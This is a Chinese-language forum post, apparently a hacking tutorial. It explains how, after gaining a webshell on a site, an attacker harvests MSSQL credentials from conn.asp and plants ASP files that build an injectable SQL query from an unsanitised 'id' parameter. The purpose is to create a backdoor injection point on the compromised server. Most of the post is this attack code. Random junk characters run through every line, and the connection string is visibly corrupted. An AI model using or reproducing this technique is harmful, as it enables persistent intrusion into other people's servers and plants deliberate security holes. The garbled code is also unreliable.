首先你要拿了一个webshell,这样你找到连接数据库的文件,大多都是conn.asp这个文件里面有mssql的用户和密码,你要找到用户名、密码、数据库所在的IP,然后连接上去,至于连接大家应该都会,找到网站管理员的表。因为我测试的时候是用管理员的表,我朋友说任何表名都可以,只要这个表存在,代码如下:2 }. I7 @1 h5 ?6 a
ASP/Visual Basic代码
1 U0 C9 Y" n* K" T<!--#include file="xx.asp"-->
1 a6 ]. T3 a& h) ~- e* g) b& C<% 3 F4 g y! y# T6 F
set rs=server.createobject("ADODB.recordset")
/ C Z( N, c3 b8 Q) nid = request("id") 1 ?. L# z+ S; k( X- o9 b
strSQL = "select * from admin where id=" & id / R. M% f4 R# ^; e( s& y- d: h
rs.open strSQL,conn,1,3 5 ~; @5 r' U6 r- X$ E4 N
rs.close
* h0 R1 q& }( [9 j- j' V%>
0 s/ Z1 t$ r# _" i" G把strSQL = "select * from admin where id=" & id 这句话里面的admin换成要伪造的表名,注意必须存在。你可以连接上去看下表名就是了!这里假设的是admin是表名!这个文件名随便保存!
" d1 k, }, E& E. o- s( N然后就要构造一个连接数据库的文件了,代码如下:) u$ ^4 u# ~& b) h
ASP/Visual Basic代码" Y, f2 ?" l+ P+ R
<% , n3 K. |( h+ N1 f: v z+ w
strSQLServerName = "000.000.000.000" '服务器名称或地址 4 h( o1 E* z9 T1 x
strSQLDBUserName = "sqlname" '数据库帐号
# m, e5 e0 P% estrSQLDBPassword = "sqlpass" '数据库密码 7 k% u& L/ V8 V: {
strSQLDBName = "sqldataname" '数据库名称 6 q" U' o2 O: _
Set conn = Server.CreateObject("ADODB.Connection") " V4 F. M. o8 [! I
strCon = "rovider=SQLOLEDB.1ersist Security Info=False;Server=" & strSQLServerName & ";User ID=" & strSQLDBUserName & "assword=" & strSQLDBPassword & ";Database=" & strSQLDBName & ";"
& |1 A7 J+ H' K9 g5 ^conn.open strCon ( @( h: o4 v! N6 U7 U
%> ( K( _$ o9 D# C# o( f
这里应该都会了,就不罗嗦了,不过注意的是保存的文件名要和include调用的名字一样。就这样,正常情况下,就OK了,伪造成功8 K* H6 u1 {* {) ~& I. m$ w
|